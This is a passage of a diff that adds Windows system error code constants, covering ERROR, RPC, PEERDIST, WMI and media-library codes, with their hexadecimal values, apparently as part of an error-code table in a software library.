+ERROR_NO_SECURITY_ON_OBJECT = 0x00000546
+ERROR_CANT_ACCESS_DOMAIN_INFO = 0x00000547
+ERROR_INVALID_SERVER_STATE = 0x00000548
+ERROR_INVALID_DOMAIN_STATE = 0x00000549
+ERROR_INVALID_DOMAIN_ROLE = 0x0000054a
+ERROR_NO_SUCH_DOMAIN = 0x0000054b
+ERROR_DOMAIN_EXISTS = 0x0000054c
+ERROR_DOMAIN_LIMIT_EXCEEDED = 0x0000054d
+ERROR_INTERNAL_DB_CORRUPTION = 0x0000054e
+ERROR_INTERNAL_ERROR = 0x0000054f
+ERROR_GENERIC_NOT_MAPPED = 0x00000550
+ERROR_BAD_DESCRIPTOR_FORMAT = 0x00000551
+ERROR_NOT_LOGON_PROCESS = 0x00000552
+ERROR_LOGON_SESSION_EXISTS = 0x00000553
+ERROR_NO_SUCH_PACKAGE = 0x00000554
+ERROR_BAD_LOGON_SESSION_STATE = 0x00000555
+ERROR_LOGON_SESSION_COLLISION = 0x00000556
+ERROR_INVALID_LOGON_TYPE = 0x00000557
+ERROR_CANNOT_IMPERSONATE = 0x00000558
+ERROR_RXACT_INVALID_STATE = 0x00000559
+ERROR_RXACT_COMMIT_FAILURE = 0x0000055a
+ERROR_SPECIAL_ACCOUNT = 0x0000055b
+ERROR_SPECIAL_GROUP = 0x0000055c
+ERROR_SPECIAL_USER = 0x0000055d
+ERROR_MEMBERS_PRIMARY_GROUP = 0x0000055e
+ERROR_TOKEN_ALREADY_IN_USE = 0x0000055f
+ERROR_NO_SUCH_ALIAS = 0x00000560
+ERROR_MEMBER_NOT_IN_ALIAS = 0x00000561
+ERROR_MEMBER_IN_ALIAS = 0x00000562
+ERROR_ALIAS_EXISTS = 0x00000563
+ERROR_LOGON_NOT_GRANTED = 0x00000564
+ERROR_TOO_MANY_SECRETS = 0x00000565
+ERROR_SECRET_TOO_LONG = 0x00000566
+ERROR_INTERNAL_DB_ERROR = 0x00000567
+ERROR_TOO_MANY_CONTEXT_IDS = 0x00000568
+ERROR_LOGON_TYPE_NOT_GRANTED = 0x00000569
+ERROR_NT_CROSS_ENCRYPTION_REQUIRED = 0x0000056a
+ERROR_NO_SUCH_MEMBER = 0x0000056b
+ERROR_INVALID_MEMBER = 0x0000056c
+ERROR_TOO_MANY_SIDS = 0x0000056d
+ERROR_LM_CROSS_ENCRYPTION_REQUIRED = 0x0000056e
+ERROR_NO_INHERITANCE = 0x0000056f
+ERROR_FILE_CORRUPT = 0x00000570
+ERROR_DISK_CORRUPT = 0x00000571
+ERROR_NO_USER_SESSION_KEY = 0x00000572
+ERROR_LICENSE_QUOTA_EXCEEDED = 0x00000573
+ERROR_WRONG_TARGET_NAME = 0x00000574
+ERROR_MUTUAL_AUTH_FAILED = 0x00000575
+ERROR_TIME_SKEW = 0x00000576
+ERROR_CURRENT_DOMAIN_NOT_ALLOWED = 0x00000577
+ERROR_INVALID_WINDOW_HANDLE = 0x00000578
+ERROR_INVALID_MENU_HANDLE = 0x00000579
+ERROR_INVALID_CURSOR_HANDLE = 0x0000057a
+ERROR_INVALID_ACCEL_HANDLE = 0x0000057b
+ERROR_INVALID_HOOK_HANDLE = 0x0000057c
+ERROR_INVALID_DWP_HANDLE = 0x0000057d
+ERROR_TLW_WITH_WSCHILD = 0x0000057e
+ERROR_CANNOT_FIND_WND_CLASS = 0x0000057f
+ERROR_WINDOW_OF_OTHER_THREAD = 0x00000580
+ERROR_HOTKEY_ALREADY_REGISTERED = 0x00000581
+ERROR_CLASS_ALREADY_EXISTS = 0x00000582
+ERROR_CLASS_DOES_NOT_EXIST = 0x00000583
+ERROR_CLASS_HAS_WINDOWS = 0x00000584
+ERROR_INVALID_INDEX = 0x00000585
+ERROR_INVALID_ICON_HANDLE = 0x00000586
+ERROR_PRIVATE_DIALOG_INDEX = 0x00000587
+ERROR_LISTBOX_ID_NOT_FOUND = 0x00000588
+ERROR_NO_WILDCARD_CHARACTERS = 0x00000589
+ERROR_CLIPBOARD_NOT_OPEN = 0x0000058a
+ERROR_HOTKEY_NOT_REGISTERED = 0x0000058b
+ERROR_WINDOW_NOT_DIALOG = 0x0000058c
+ERROR_CONTROL_ID_NOT_FOUND = 0x0000058d
+ERROR_INVALID_COMBOBOX_MESSAGE = 0x0000058e
+ERROR_WINDOW_NOT_COMBOBOX = 0x0000058f
+ERROR_INVALID_EDIT_HEIGHT = 0x00000590
+ERROR_DC_NOT_FOUND = 0x00000591
+ERROR_INVALID_HOOK_FILTER = 0x00000592
+ERROR_INVALID_FILTER_PROC = 0x00000593
+ERROR_HOOK_NEEDS_HMOD = 0x00000594
+ERROR_GLOBAL_ONLY_HOOK = 0x00000595
+ERROR_JOURNAL_HOOK_SET = 0x00000596
+ERROR_HOOK_NOT_INSTALLED = 0x00000597
+ERROR_INVALID_LB_MESSAGE = 0x00000598
+ERROR_SETCOUNT_ON_BAD_LB = 0x00000599
+ERROR_LB_WITHOUT_TABSTOPS = 0x0000059a
+ERROR_DESTROY_OBJECT_OF_OTHER_THREAD = 0x0000059b
+ERROR_CHILD_WINDOW_MENU = 0x0000059c
+ERROR_NO_SYSTEM_MENU = 0x0000059d
+ERROR_INVALID_MSGBOX_STYLE = 0x0000059e
+ERROR_INVALID_SPI_VALUE = 0x0000059f
+ERROR_SCREEN_ALREADY_LOCKED = 0x000005a0
+ERROR_HWNDS_HAVE_DIFF_PARENT = 0x000005a1
+ERROR_NOT_CHILD_WINDOW = 0x000005a2
+ERROR_INVALID_GW_COMMAND = 0x000005a3
+ERROR_INVALID_THREAD_ID = 0x000005a4
+ERROR_NON_MDICHILD_WINDOW = 0x000005a5
+ERROR_POPUP_ALREADY_ACTIVE = 0x000005a6
+ERROR_NO_SCROLLBARS = 0x000005a7
+ERROR_INVALID_SCROLLBAR_RANGE = 0x000005a8
+ERROR_INVALID_SHOWWIN_COMMAND = 0x000005a9
+ERROR_NO_SYSTEM_RESOURCES = 0x000005aa
+ERROR_NONPAGED_SYSTEM_RESOURCES = 0x000005ab
+ERROR_PAGED_SYSTEM_RESOURCES = 0x000005ac
+ERROR_WORKING_SET_QUOTA = 0x000005ad
+ERROR_PAGEFILE_QUOTA = 0x000005ae
+ERROR_COMMITMENT_LIMIT = 0x000005af
+ERROR_MENU_ITEM_NOT_FOUND = 0x000005b0
+ERROR_INVALID_KEYBOARD_HANDLE = 0x000005b1
+ERROR_HOOK_TYPE_NOT_ALLOWED = 0x000005b2
+ERROR_REQUIRES_INTERACTIVE_WINDOWSTATION = 0x000005b3
+ERROR_TIMEOUT = 0x000005b4
+ERROR_INVALID_MONITOR_HANDLE = 0x000005b5
+ERROR_INCORRECT_SIZE = 0x000005b6
+ERROR_SYMLINK_CLASS_DISABLED = 0x000005b7
+ERROR_SYMLINK_NOT_SUPPORTED = 0x000005b8
+ERROR_XML_PARSE_ERROR = 0x000005b9
+ERROR_XMLDSIG_ERROR = 0x000005ba
+ERROR_RESTART_APPLICATION = 0x000005bb
+ERROR_WRONG_COMPARTMENT = 0x000005bc
+ERROR_AUTHIP_FAILURE = 0x000005bd
+ERROR_NO_NVRAM_RESOURCES = 0x000005be
+ERROR_NOT_GUI_PROCESS = 0x000005bf
+ERROR_EVENTLOG_FILE_CORRUPT = 0x000005dc
+ERROR_EVENTLOG_CANT_START = 0x000005dd
+ERROR_LOG_FILE_FULL = 0x000005de
+ERROR_EVENTLOG_FILE_CHANGED = 0x000005df
+ERROR_INVALID_TASK_NAME = 0x0000060e
+ERROR_INVALID_TASK_INDEX = 0x0000060f
+ERROR_THREAD_ALREADY_IN_TASK = 0x00000610
+ERROR_INSTALL_SERVICE_FAILURE = 0x00000641
+ERROR_INSTALL_USEREXIT = 0x00000642
+ERROR_INSTALL_FAILURE = 0x00000643
+ERROR_INSTALL_SUSPEND = 0x00000644
+ERROR_UNKNOWN_PRODUCT = 0x00000645
+ERROR_UNKNOWN_FEATURE = 0x00000646
+ERROR_UNKNOWN_COMPONENT = 0x00000647
+ERROR_UNKNOWN_PROPERTY = 0x00000648
+ERROR_INVALID_HANDLE_STATE = 0x00000649
+ERROR_BAD_CONFIGURATION = 0x0000064a
+ERROR_INDEX_ABSENT = 0x0000064b
+ERROR_INSTALL_SOURCE_ABSENT = 0x0000064c
+ERROR_INSTALL_PACKAGE_VERSION = 0x0000064d
+ERROR_PRODUCT_UNINSTALLED = 0x0000064e
+ERROR_BAD_QUERY_SYNTAX = 0x0000064f
+ERROR_INVALID_FIELD = 0x00000650
+ERROR_DEVICE_REMOVED = 0x00000651
+ERROR_INSTALL_ALREADY_RUNNING = 0x00000652
+ERROR_INSTALL_PACKAGE_OPEN_FAILED = 0x00000653
+ERROR_INSTALL_PACKAGE_INVALID = 0x00000654
+ERROR_INSTALL_UI_FAILURE = 0x00000655
+ERROR_INSTALL_LOG_FAILURE = 0x00000656
+ERROR_INSTALL_LANGUAGE_UNSUPPORTED = 0x00000657
+ERROR_INSTALL_TRANSFORM_FAILURE = 0x00000658
+ERROR_INSTALL_PACKAGE_REJECTED = 0x00000659
+ERROR_FUNCTION_NOT_CALLED = 0x0000065a
+ERROR_FUNCTION_FAILED = 0x0000065b
+ERROR_INVALID_TABLE = 0x0000065c
+ERROR_DATATYPE_MISMATCH = 0x0000065d
+ERROR_UNSUPPORTED_TYPE = 0x0000065e
+ERROR_CREATE_FAILED = 0x0000065f
+ERROR_INSTALL_TEMP_UNWRITABLE = 0x00000660
+ERROR_INSTALL_PLATFORM_UNSUPPORTED = 0x00000661
+ERROR_INSTALL_NOTUSED = 0x00000662
+ERROR_PATCH_PACKAGE_OPEN_FAILED = 0x00000663
+ERROR_PATCH_PACKAGE_INVALID = 0x00000664
+ERROR_PATCH_PACKAGE_UNSUPPORTED = 0x00000665
+ERROR_PRODUCT_VERSION = 0x00000666
+ERROR_INVALID_COMMAND_LINE = 0x00000667
+ERROR_INSTALL_REMOTE_DISALLOWED = 0x00000668
+ERROR_SUCCESS_REBOOT_INITIATED = 0x00000669
+ERROR_PATCH_TARGET_NOT_FOUND = 0x0000066a
+ERROR_PATCH_PACKAGE_REJECTED = 0x0000066b
+ERROR_INSTALL_TRANSFORM_REJECTED = 0x0000066c
+ERROR_INSTALL_REMOTE_PROHIBITED = 0x0000066d
+ERROR_PATCH_REMOVAL_UNSUPPORTED = 0x0000066e
+ERROR_UNKNOWN_PATCH = 0x0000066f
+ERROR_PATCH_NO_SEQUENCE = 0x00000670
+ERROR_PATCH_REMOVAL_DISALLOWED = 0x00000671
+ERROR_INVALID_PATCH_XML = 0x00000672
+ERROR_PATCH_MANAGED_ADVERTISED_PRODUCT = 0x00000673
+ERROR_INSTALL_SERVICE_SAFEBOOT = 0x00000674
+ERROR_FAIL_FAST_EXCEPTION = 0x00000675
+ERROR_INSTALL_REJECTED = 0x00000676
+RPC_S_INVALID_STRING_BINDING = 0x000006a4
+RPC_S_WRONG_KIND_OF_BINDING = 0x000006a5
+RPC_S_INVALID_BINDING = 0x000006a6
+RPC_S_PROTSEQ_NOT_SUPPORTED = 0x000006a7
+RPC_S_INVALID_RPC_PROTSEQ = 0x000006a8
+RPC_S_INVALID_STRING_UUID = 0x000006a9
+RPC_S_INVALID_ENDPOINT_FORMAT = 0x000006aa
+RPC_S_INVALID_NET_ADDR = 0x000006ab
+RPC_S_NO_ENDPOINT_FOUND = 0x000006ac
+RPC_S_INVALID_TIMEOUT = 0x000006ad
+RPC_S_OBJECT_NOT_FOUND = 0x000006ae
+RPC_S_ALREADY_REGISTERED = 0x000006af
+RPC_S_TYPE_ALREADY_REGISTERED = 0x000006b0
+RPC_S_ALREADY_LISTENING = 0x000006b1
+RPC_S_NO_PROTSEQS_REGISTERED = 0x000006b2
+RPC_S_NOT_LISTENING = 0x000006b3
+RPC_S_UNKNOWN_MGR_TYPE = 0x000006b4
+RPC_S_UNKNOWN_IF = 0x000006b5
+RPC_S_NO_BINDINGS = 0x000006b6
+RPC_S_NO_PROTSEQS = 0x000006b7
+RPC_S_CANT_CREATE_ENDPOINT = 0x000006b8
+RPC_S_OUT_OF_RESOURCES = 0x000006b9
+RPC_S_SERVER_UNAVAILABLE = 0x000006ba
+RPC_S_SERVER_TOO_BUSY = 0x000006bb
+RPC_S_INVALID_NETWORK_OPTIONS = 0x000006bc
+RPC_S_NO_CALL_ACTIVE = 0x000006bd
+RPC_S_CALL_FAILED = 0x000006be
+RPC_S_CALL_FAILED_DNE = 0x000006bf
+RPC_S_PROTOCOL_ERROR = 0x000006c0
+RPC_S_PROXY_ACCESS_DENIED = 0x000006c1
+RPC_S_UNSUPPORTED_TRANS_SYN = 0x000006c2
+RPC_S_UNSUPPORTED_TYPE = 0x000006c4
+RPC_S_INVALID_TAG = 0x000006c5
+RPC_S_INVALID_BOUND = 0x000006c6
+RPC_S_NO_ENTRY_NAME = 0x000006c7
+RPC_S_INVALID_NAME_SYNTAX = 0x000006c8
+RPC_S_UNSUPPORTED_NAME_SYNTAX = 0x000006c9
+RPC_S_UUID_NO_ADDRESS = 0x000006cb
+RPC_S_DUPLICATE_ENDPOINT = 0x000006cc
+RPC_S_UNKNOWN_AUTHN_TYPE = 0x000006cd
+RPC_S_MAX_CALLS_TOO_SMALL = 0x000006ce
+RPC_S_STRING_TOO_LONG = 0x000006cf
+RPC_S_PROTSEQ_NOT_FOUND = 0x000006d0
+RPC_S_PROCNUM_OUT_OF_RANGE = 0x000006d1
+RPC_S_BINDING_HAS_NO_AUTH = 0x000006d2
+RPC_S_UNKNOWN_AUTHN_SERVICE = 0x000006d3
+RPC_S_UNKNOWN_AUTHN_LEVEL = 0x000006d4
+RPC_S_INVALID_AUTH_IDENTITY = 0x000006d5
+RPC_S_UNKNOWN_AUTHZ_SERVICE = 0x000006d6
+EPT_S_INVALID_ENTRY = 0x000006d7
+EPT_S_CANT_PERFORM_OP = 0x000006d8
+EPT_S_NOT_REGISTERED = 0x000006d9
+RPC_S_NOTHING_TO_EXPORT = 0x000006da
+RPC_S_INCOMPLETE_NAME = 0x000006db
+RPC_S_INVALID_VERS_OPTION = 0x000006dc
+RPC_S_NO_MORE_MEMBERS = 0x000006dd
+RPC_S_NOT_ALL_OBJS_UNEXPORTED = 0x000006de
+RPC_S_INTERFACE_NOT_FOUND = 0x000006df
+RPC_S_ENTRY_ALREADY_EXISTS = 0x000006e0
+RPC_S_ENTRY_NOT_FOUND = 0x000006e1
+RPC_S_NAME_SERVICE_UNAVAILABLE = 0x000006e2
+RPC_S_INVALID_NAF_ID = 0x000006e3
+RPC_S_CANNOT_SUPPORT = 0x000006e4
+RPC_S_NO_CONTEXT_AVAILABLE = 0x000006e5
+RPC_S_INTERNAL_ERROR = 0x000006e6
+RPC_S_ZERO_DIVIDE = 0x000006e7
+RPC_S_ADDRESS_ERROR = 0x000006e8
+RPC_S_FP_DIV_ZERO = 0x000006e9
+RPC_S_FP_UNDERFLOW = 0x000006ea
+RPC_S_FP_OVERFLOW = 0x000006eb
+RPC_X_NO_MORE_ENTRIES = 0x000006ec
+RPC_X_SS_CHAR_TRANS_OPEN_FAIL = 0x000006ed
+RPC_X_SS_CHAR_TRANS_SHORT_FILE = 0x000006ee
+RPC_X_SS_IN_NULL_CONTEXT = 0x000006ef
+RPC_X_SS_CONTEXT_DAMAGED = 0x000006f1
+RPC_X_SS_HANDLES_MISMATCH = 0x000006f2
+RPC_X_SS_CANNOT_GET_CALL_HANDLE = 0x000006f3
+RPC_X_NULL_REF_POINTER = 0x000006f4
+RPC_X_ENUM_VALUE_OUT_OF_RANGE = 0x000006f5
+RPC_X_BYTE_COUNT_TOO_SMALL = 0x000006f6
+RPC_X_BAD_STUB_DATA = 0x000006f7
+ERROR_INVALID_USER_BUFFER = 0x000006f8
+ERROR_UNRECOGNIZED_MEDIA = 0x000006f9
+ERROR_NO_TRUST_LSA_SECRET = 0x000006fa
+ERROR_NO_TRUST_SAM_ACCOUNT = 0x000006fb
+ERROR_TRUSTED_DOMAIN_FAILURE = 0x000006fc
+ERROR_TRUSTED_RELATIONSHIP_FAILURE = 0x000006fd
+ERROR_TRUST_FAILURE = 0x000006fe
+RPC_S_CALL_IN_PROGRESS = 0x000006ff
+ERROR_NETLOGON_NOT_STARTED = 0x00000700
+ERROR_ACCOUNT_EXPIRED = 0x00000701
+ERROR_REDIRECTOR_HAS_OPEN_HANDLES = 0x00000702
+ERROR_PRINTER_DRIVER_ALREADY_INSTALLED = 0x00000703
+ERROR_UNKNOWN_PORT = 0x00000704
+ERROR_UNKNOWN_PRINTER_DRIVER = 0x00000705
+ERROR_UNKNOWN_PRINTPROCESSOR = 0x00000706
+ERROR_INVALID_SEPARATOR_FILE = 0x00000707
+ERROR_INVALID_PRIORITY = 0x00000708
+ERROR_INVALID_PRINTER_NAME = 0x00000709
+ERROR_PRINTER_ALREADY_EXISTS = 0x0000070a
+ERROR_INVALID_PRINTER_COMMAND = 0x0000070b
+ERROR_INVALID_DATATYPE = 0x0000070c
+ERROR_INVALID_ENVIRONMENT = 0x0000070d
+RPC_S_NO_MORE_BINDINGS = 0x0000070e
+ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0x0000070f
+ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0x00000710
+ERROR_NOLOGON_SERVER_TRUST_ACCOUNT = 0x00000711
+ERROR_DOMAIN_TRUST_INCONSISTENT = 0x00000712
+ERROR_SERVER_HAS_OPEN_HANDLES = 0x00000713
+ERROR_RESOURCE_DATA_NOT_FOUND = 0x00000714
+ERROR_RESOURCE_TYPE_NOT_FOUND = 0x00000715
+ERROR_RESOURCE_NAME_NOT_FOUND = 0x00000716
+ERROR_RESOURCE_LANG_NOT_FOUND = 0x00000717
+ERROR_NOT_ENOUGH_QUOTA = 0x00000718
+RPC_S_NO_INTERFACES = 0x00000719
+RPC_S_CALL_CANCELLED = 0x0000071a
+RPC_S_BINDING_INCOMPLETE = 0x0000071b
+RPC_S_COMM_FAILURE = 0x0000071c
+RPC_S_UNSUPPORTED_AUTHN_LEVEL = 0x0000071d
+RPC_S_NO_PRINC_NAME = 0x0000071e
+RPC_S_NOT_RPC_ERROR = 0x0000071f
+RPC_S_UUID_LOCAL_ONLY = 0x00000720
+RPC_S_SEC_PKG_ERROR = 0x00000721
+RPC_S_NOT_CANCELLED = 0x00000722
+RPC_X_INVALID_ES_ACTION = 0x00000723
+RPC_X_WRONG_ES_VERSION = 0x00000724
+RPC_X_WRONG_STUB_VERSION = 0x00000725
+RPC_X_INVALID_PIPE_OBJECT = 0x00000726
+RPC_X_WRONG_PIPE_ORDER = 0x00000727
+RPC_X_WRONG_PIPE_VERSION = 0x00000728
+RPC_S_COOKIE_AUTH_FAILED = 0x00000729
+RPC_S_GROUP_MEMBER_NOT_FOUND = 0x0000076a
+EPT_S_CANT_CREATE = 0x0000076b
+RPC_S_INVALID_OBJECT = 0x0000076c
+ERROR_INVALID_TIME = 0x0000076d
+ERROR_INVALID_FORM_NAME = 0x0000076e
+ERROR_INVALID_FORM_SIZE = 0x0000076f
+ERROR_ALREADY_WAITING = 0x00000770
+ERROR_PRINTER_DELETED = 0x00000771
+ERROR_INVALID_PRINTER_STATE = 0x00000772
+ERROR_PASSWORD_MUST_CHANGE = 0x00000773
+ERROR_DOMAIN_CONTROLLER_NOT_FOUND = 0x00000774
+ERROR_ACCOUNT_LOCKED_OUT = 0x00000775
+OR_INVALID_OXID = 0x00000776
+OR_INVALID_OID = 0x00000777
+OR_INVALID_SET = 0x00000778
+RPC_S_SEND_INCOMPLETE = 0x00000779
+RPC_S_INVALID_ASYNC_HANDLE = 0x0000077a
+RPC_S_INVALID_ASYNC_CALL = 0x0000077b
+RPC_X_PIPE_CLOSED = 0x0000077c
+RPC_X_PIPE_DISCIPLINE_ERROR = 0x0000077d
+RPC_X_PIPE_EMPTY = 0x0000077e
+ERROR_NO_SITENAME = 0x0000077f
+ERROR_CANT_ACCESS_FILE = 0x00000780
+ERROR_CANT_RESOLVE_FILENAME = 0x00000781
+RPC_S_ENTRY_TYPE_MISMATCH = 0x00000782
+RPC_S_NOT_ALL_OBJS_EXPORTED = 0x00000783
+RPC_S_INTERFACE_NOT_EXPORTED = 0x00000784
+RPC_S_PROFILE_NOT_ADDED = 0x00000785
+RPC_S_PRF_ELT_NOT_ADDED = 0x00000786
+RPC_S_PRF_ELT_NOT_REMOVED = 0x00000787
+RPC_S_GRP_ELT_NOT_ADDED = 0x00000788
+RPC_S_GRP_ELT_NOT_REMOVED = 0x00000789
+ERROR_KM_DRIVER_BLOCKED = 0x0000078a
+ERROR_CONTEXT_EXPIRED = 0x0000078b
+ERROR_PER_USER_TRUST_QUOTA_EXCEEDED = 0x0000078c
+ERROR_ALL_USER_TRUST_QUOTA_EXCEEDED = 0x0000078d
+ERROR_USER_DELETE_TRUST_QUOTA_EXCEEDED = 0x0000078e
+ERROR_AUTHENTICATION_FIREWALL_FAILED = 0x0000078f
+ERROR_REMOTE_PRINT_CONNECTIONS_BLOCKED = 0x00000790
+ERROR_NTLM_BLOCKED = 0x00000791
+ERROR_PASSWORD_CHANGE_REQUIRED = 0x00000792
+ERROR_INVALID_PIXEL_FORMAT = 0x000007d0
+ERROR_BAD_DRIVER = 0x000007d1
+ERROR_INVALID_WINDOW_STYLE = 0x000007d2
+ERROR_METAFILE_NOT_SUPPORTED = 0x000007d3
+ERROR_TRANSFORM_NOT_SUPPORTED = 0x000007d4
+ERROR_CLIPPING_NOT_SUPPORTED = 0x000007d5
+ERROR_INVALID_CMM = 0x000007da
+ERROR_INVALID_PROFILE = 0x000007db
+ERROR_TAG_NOT_FOUND = 0x000007dc
+ERROR_TAG_NOT_PRESENT = 0x000007dd
+ERROR_DUPLICATE_TAG = 0x000007de
+ERROR_PROFILE_NOT_ASSOCIATED_WITH_DEVICE = 0x000007df
+ERROR_PROFILE_NOT_FOUND = 0x000007e0
+ERROR_INVALID_COLORSPACE = 0x000007e1
+ERROR_ICM_NOT_ENABLED = 0x000007e2
+ERROR_DELETING_ICM_XFORM = 0x000007e3
+ERROR_INVALID_TRANSFORM = 0x000007e4
+ERROR_COLORSPACE_MISMATCH = 0x000007e5
+ERROR_INVALID_COLORINDEX = 0x000007e6
+ERROR_PROFILE_DOES_NOT_MATCH_DEVICE = 0x000007e7
+ERROR_CONNECTED_OTHER_PASSWORD = 0x0000083c
+ERROR_CONNECTED_OTHER_PASSWORD_DEFAULT = 0x0000083d
+ERROR_BAD_USERNAME = 0x0000089a
+ERROR_NOT_CONNECTED = 0x000008ca
+ERROR_OPEN_FILES = 0x00000961
+ERROR_ACTIVE_CONNECTIONS = 0x00000962
+ERROR_DEVICE_IN_USE = 0x00000964
+ERROR_UNKNOWN_PRINT_MONITOR = 0x00000bb8
+ERROR_PRINTER_DRIVER_IN_USE = 0x00000bb9
+ERROR_SPOOL_FILE_NOT_FOUND = 0x00000bba
+ERROR_SPL_NO_STARTDOC = 0x00000bbb
+ERROR_SPL_NO_ADDJOB = 0x00000bbc
+ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED = 0x00000bbd
+ERROR_PRINT_MONITOR_ALREADY_INSTALLED = 0x00000bbe
+ERROR_INVALID_PRINT_MONITOR = 0x00000bbf
+ERROR_PRINT_MONITOR_IN_USE = 0x00000bc0
+ERROR_PRINTER_HAS_JOBS_QUEUED = 0x00000bc1
+ERROR_SUCCESS_REBOOT_REQUIRED = 0x00000bc2
+ERROR_SUCCESS_RESTART_REQUIRED = 0x00000bc3
+ERROR_PRINTER_NOT_FOUND = 0x00000bc4
+ERROR_PRINTER_DRIVER_WARNED = 0x00000bc5
+ERROR_PRINTER_DRIVER_BLOCKED = 0x00000bc6
+ERROR_PRINTER_DRIVER_PACKAGE_IN_USE = 0x00000bc7
+ERROR_CORE_DRIVER_PACKAGE_NOT_FOUND = 0x00000bc8
+ERROR_FAIL_REBOOT_REQUIRED = 0x00000bc9
+ERROR_FAIL_REBOOT_INITIATED = 0x00000bca
+ERROR_PRINTER_DRIVER_DOWNLOAD_NEEDED = 0x00000bcb
+ERROR_PRINT_JOB_RESTART_REQUIRED = 0x00000bcc
+ERROR_INVALID_PRINTER_DRIVER_MANIFEST = 0x00000bcd
+ERROR_PRINTER_NOT_SHAREABLE = 0x00000bce
+ERROR_REQUEST_PAUSED = 0x00000bea
+ERROR_IO_REISSUE_AS_CACHED = 0x00000f6e
+ERROR_WINS_INTERNAL = 0x00000fa0
+ERROR_CAN_NOT_DEL_LOCAL_WINS = 0x00000fa1
+ERROR_STATIC_INIT = 0x00000fa2
+ERROR_INC_BACKUP = 0x00000fa3
+ERROR_FULL_BACKUP = 0x00000fa4
+ERROR_REC_NON_EXISTENT = 0x00000fa5
+ERROR_RPL_NOT_ALLOWED = 0x00000fa6
+PEERDIST_ERROR_CONTENTINFO_VERSION_UNSUPPORTED = 0x00000fd2
+PEERDIST_ERROR_CANNOT_PARSE_CONTENTINFO = 0x00000fd3
+PEERDIST_ERROR_MISSING_DATA = 0x00000fd4
+PEERDIST_ERROR_NO_MORE = 0x00000fd5
+PEERDIST_ERROR_NOT_INITIALIZED = 0x00000fd6
+PEERDIST_ERROR_ALREADY_INITIALIZED = 0x00000fd7
+PEERDIST_ERROR_SHUTDOWN_IN_PROGRESS = 0x00000fd8
+PEERDIST_ERROR_INVALIDATED = 0x00000fd9
+PEERDIST_ERROR_ALREADY_EXISTS = 0x00000fda
+PEERDIST_ERROR_OPERATION_NOTFOUND = 0x00000fdb
+PEERDIST_ERROR_ALREADY_COMPLETED = 0x00000fdc
+PEERDIST_ERROR_OUT_OF_BOUNDS = 0x00000fdd
+PEERDIST_ERROR_VERSION_UNSUPPORTED = 0x00000fde
+PEERDIST_ERROR_INVALID_CONFIGURATION = 0x00000fdf
+PEERDIST_ERROR_NOT_LICENSED = 0x00000fe0
+PEERDIST_ERROR_SERVICE_UNAVAILABLE = 0x00000fe1
+PEERDIST_ERROR_TRUST_FAILURE = 0x00000fe2
+ERROR_DHCP_ADDRESS_CONFLICT = 0x00001004
+ERROR_WMI_GUID_NOT_FOUND = 0x00001068
+ERROR_WMI_INSTANCE_NOT_FOUND = 0x00001069
+ERROR_WMI_ITEMID_NOT_FOUND = 0x0000106a
+ERROR_WMI_TRY_AGAIN = 0x0000106b
+ERROR_WMI_DP_NOT_FOUND = 0x0000106c
+ERROR_WMI_UNRESOLVED_INSTANCE_REF = 0x0000106d
+ERROR_WMI_ALREADY_ENABLED = 0x0000106e
+ERROR_WMI_GUID_DISCONNECTED = 0x0000106f
+ERROR_WMI_SERVER_UNAVAILABLE = 0x00001070
+ERROR_WMI_DP_FAILED = 0x00001071
+ERROR_WMI_INVALID_MOF = 0x00001072
+ERROR_WMI_INVALID_REGINFO = 0x00001073
+ERROR_WMI_ALREADY_DISABLED = 0x00001074
+ERROR_WMI_READ_ONLY = 0x00001075
+ERROR_WMI_SET_FAILURE = 0x00001076
+ERROR_NOT_APPCONTAINER = 0x0000109a
+ERROR_APPCONTAINER_REQUIRED = 0x0000109b
+ERROR_NOT_SUPPORTED_IN_APPCONTAINER = 0x0000109c
+ERROR_INVALID_PACKAGE_SID_LENGTH = 0x0000109d
+ERROR_INVALID_MEDIA = 0x000010cc
+ERROR_INVALID_LIBRARY = 0x000010cd
+ERROR_INVALID_MEDIA_POOL = 0x000010ce
+ERROR_DRIVE_MEDIA_MISMATCH = 0x000010cf
+ERROR_MEDIA_OFFLINE = 0x000010d0
+ERROR_LIBRARY_OFFLINE = 0x000010d1
+ERROR_EMPTY = 0x000010d2
+ERROR_NOT_EMPTY = 0x000010d3
+ERROR_MEDIA_UNAVAILABLE = 0x000010d4
+ERROR_RESOURCE_DISABLED = 0x000010d5
+ERROR_INVALID_CLEANER = 0x000010d6
+ERROR_UNABLE_TO_CLEAN = 0x000010d7
+ERROR_OBJECT_NOT_FOUND = 0x000010d8
+ERROR_DATABASE_FAILURE = 0x000010d9
+ERROR_DATABASE_FULL = 0x000010da
+ERROR_MEDIA_INCOMPATIBLE = 0x000010db
+ERROR_RESOURCE_NOT_PRESENT = 0x000010dc
+ERROR_INVALID_OPERATION = 0x000010dd
+ERROR_MEDIA_NOT_AVAILABLE = 0x000010de
+ERROR_DEVICE_NOT_AVAILABLE = 0x000010df
+ERROR_REQUEST_REFUSED = 0x000010e0
+ERROR_INVALID_DRIVE_OBJECT = 0x000010e1
+ERROR_LIBRARY_FULL = 0x000010e2
+ERROR_MEDIUM_NOT_ACCESSIBLE = 0x000010e3
+ERROR_UNABLE_TO_LOAD_MEDIUM = 0x000010e4
+ERROR_UNABLE_TO_INVENTORY_DRIVE = 0x000010e5
+ERROR_UNABLE_TO_INVENTORY_SLOT = 0x000010e6
+ERROR_UNABLE_TO_INVENTORY_TRANSPORT = 0x000010e7
+ERROR_TRANSPORT_FULL = 0x000010e8
+ERROR_CONTROLLING_IEPORT = 0x000010e9
+ERROR_UNABLE_TO_EJECT_MOUNTED_MEDIA = 0x000010ea
+ERROR_CLEANER_SLOT_SET = 0x000010eb
+ERROR_CLEANER_SLOT_NOT_SET = 0x000010ec
+ERROR_CLEANER_CARTRIDGE_SPENT = 0x000010ed
+ERROR_UNEXPECTED_OMID = 0x000010ee
+ERROR_CANT_DELETE_LAST_ITEM = 0x000010ef
+ERROR_MESSAGE_EXCEEDS_MAX_SIZE = 0x000010f0
+ERROR_VOLUME_CONTAINS_SYS_FILES = 0x000010f1
+ERROR_INDIGENOUS_TYPE = 0x000010f2
+ERROR_NO_SUPPORTING_DRIVES = 0x000010f3
+ERROR_CLEANER_CARTRIDGE_INSTALLED = 0x000010f4
+ERROR_IEPORT_FULL = 0x000010f5
+ERROR_FILE_OFFLINE = 0x000010fe
+ERROR_REMOTE_STORAGE_NOT_ACTIVE = 0x000010ff
